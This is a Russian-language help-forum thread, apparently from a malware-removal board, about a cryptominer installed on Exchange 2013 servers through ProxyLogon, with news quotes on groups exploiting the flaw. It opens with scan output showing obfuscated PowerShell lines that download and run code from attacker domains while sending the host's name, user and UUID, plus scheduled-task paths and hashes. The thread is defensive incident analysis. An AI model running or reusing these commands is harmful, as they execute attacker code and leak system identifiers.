CmdLine -C (NEW-OBJECT NET.WEBCLIENT).DOWNLOADSTRING('HTTP://'+'T.NET'+'CATKIT.COM/A.JSP?REP_20210317?'+(@($ENV:COMPUTERNAME,$ENV:USERNAME,(GET-WMIOBJECT WIN32_COMPUTERSYSTEMPRODUCT).UUID,(RANDOM))-JOIN'*'))
CmdLine -C (NEW-OBJECT NET.WEBCLIENT).DOWNLOADSTRING('HTTP://'+'T.NET'+'CATKIT.COM/A.JSP?REP_20210317?'+(@($ENV:COMPUTERNAME,$ENV:USERNAME,(GET-WMIOBJECT WIN32_COMPUTERSYSTEMPRODUCT).UUID,(RANDOM))-JOIN'*'))
CmdLine -W HIDDEN -C I`EX ([SYSTEM.TEXT.ENCODING]::ASCII.GETSTRING((NEW-OBJECT NET.WEBCLIENT).DOWNLOADDATA('HTTP://'+'T.SQL'+'NETCAT.COM/A.JSP?_20210317?'+(@($ENV:COMPUTERNAME,$ENV:USERNAME,(GET-WMIOBJECT WIN32_COMPUTERSYSTEMPRODUCT).UUID,(RANDOM))-JOIN'*'))))
CmdLine -C (NEW-OBJECT NET.WEBCLIENT).DOWNLOADSTRING('HTTP://'+'T.NET'+'CATKIT.COM/A.JSP?REP_20210317?'+(@($ENV:COMPUTERNAME,$ENV:USERNAME,(GET-WMIOBJECT WIN32_COMPUTERSYSTEMPRODUCT).UUID,(RANDOM))-JOIN'*'))
CmdLine -W HIDDEN -C I`EX ([SYSTEM.TEXT.ENCODING]::ASCII.GETSTRING((NEW-OBJECT NET.WEBCLIENT).DOWNLOADDATA('HTTP://'+'DOWN.'+'SQLNETCAT.COM/A.JSP?_20210317?'+(@($ENV:COMPUTERNAME,$ENV:USERNAME,(GET-WMIOBJECT WIN32_COMPUTERSYSTEMPRODUCT).UUID,(RANDOM))-JOIN'*'))))
SHA1 9F1E24917EF96BBB339F4E2A226ACAFD1009F47B
MD5 C031E215B8B08C752BF362F6D4C5D3AD

Ссылки на объект
Ссылка C:\WINDOWS\SYSTEM32\TASKS\A5TORJ3ZT

Ссылка C:\WINDOWS\SYSTEM32\TASKS\AVCZOHW

Ссылка C:\WINDOWS\SYSTEM32\TASKS\JCA9PD

Ссылка C:\WINDOWS\SYSTEM32\TASKS\Microsoft\Windows\eUuwdKQkPqT\SMYVSZY4OWX

Ссылка C:\WINDOWS\SYSTEM32\TASKS\O6YM9I

Ссылка C:\WINDOWS\SYSTEM32\TASKS\Xnqm40cRo\ZUPKUTWN

[ Как создать образ автозапуска? ]

Перейти

[ Закрыто] запуск майнера на серверах с MS Exchange 2013, ProxyLogon

Сообщений: 17977

Баллов: 28762

Регистрация: 16.03.2010

Размещено 18.03.2021 04:53:31

Цитата
santy написал: [QUOTE] Владимир Шариков написал: Что этот код делает? Стоит ли боятся "Последствий" этой бяки?

я думаю стоит. эксплойт для ProxyLogon, по словам исследователей, мог использоваться в теч двух месяцев, до выхода мартовского обновления от Microsoft. (Возможно, была утечка эксплойта через поставщиков ПО, которые имеют ранний доступ к полученным сообщениям от исследователей)

Цитата
После выхода официальных исправлений даже для неподдерживаемых версий уязвимые серверы Microsoft Exchange, напрямую открытые в Интернете, стали еще более горячей целью, поскольку злоумышленники могли перепроектировать обновления для создания эксплойта. ESET видела, что более 10 групп APT бросились атаковать непропатченные устройства. Многие из них занимались кибершпионажем, и в этот список входят Mikroceen и Tonto Team, но не все. Исследователи заметили активность группы, которую они называют «Opera» Cobalt Strike, которая использовала уязвимости Microsoft Exchange для установки продукта для тестирования на проникновение Cobalt Strike, который является обычным для некоторых известных кибергрупп Ransomware. В другом случае ESET заметил, что злоумышленник сбрасывает веб-оболочки, чтобы «установить так называемые бэкдоры IIS». Активность, приписываемая ботнету DLTMiner [1, 2], занимающемуся майнингом криптовалют, была замечена на серверах, которые были атакованы с помощью уязвимостей ProxyLogon.

Цитата

После выхода официальных исправлений даже для неподдерживаемых версий уязвимые серверы Microsoft Exchange, напрямую открытые в Интернете, стали еще более горячей целью, поскольку злоумышленники могли перепроектировать обновления для создания эксплойта.

ESET видела, что более 10 групп APT бросились атаковать непропатченные устройства. Многие из них занимались кибершпионажем, и в этот список входят Mikroceen и Tonto Team, но не все.

Исследователи заметили активность группы, которую они называют «Opera» Cobalt Strike, которая использовала уязвимости Microsoft Exchange для установки продукта для тестирования на проникновение Cobalt Strike, который является обычным для некоторых известных кибергрупп Ransomware.

В другом случае ESET заметил, что злоумышленник сбрасывает веб-оболочки, чтобы «установить так называемые бэкдоры IIS». Активность, приписываемая ботнету DLTMiner [1, 2], занимающемуся майнингом криптовалют, была замечена на серверах, которые были атакованы с помощью уязвимостей ProxyLogon.

Цитата
Вице-президент Mandiant по анализу, Джон Халтквист, ожидает, что в ближайшее время банды вымогателей будут еще больше использовать уязвимости ProxyLogon, которые могут найти вектор атаки «особенно привлекательным», поскольку он является «эффективным средством получения доступа администратора домена». «Этот доступ позволяет им развертывать шифрование на предприятии. В случаях, когда организации не исправлены, эти уязвимости предоставят преступникам более быстрый путь к успеху », - Джон Халтквист.

Цитата

Вице-президент Mandiant по анализу, Джон Халтквист, ожидает, что в ближайшее время банды вымогателей будут еще больше использовать уязвимости ProxyLogon, которые могут найти вектор атаки «особенно привлекательным», поскольку он является «эффективным средством получения доступа администратора домена».

«Этот доступ позволяет им развертывать шифрование на предприятии. В случаях, когда организации не исправлены, эти уязвимости предоставят преступникам более быстрый путь к успеху », - Джон Халтквист.

более подробно, здесь
https://www.bleepingcomputer.com/news/security/the-microsoft-exchange-hacks-how-they-started-and-where-we-are/

[ Как создать образ автозапуска? ]

Перейти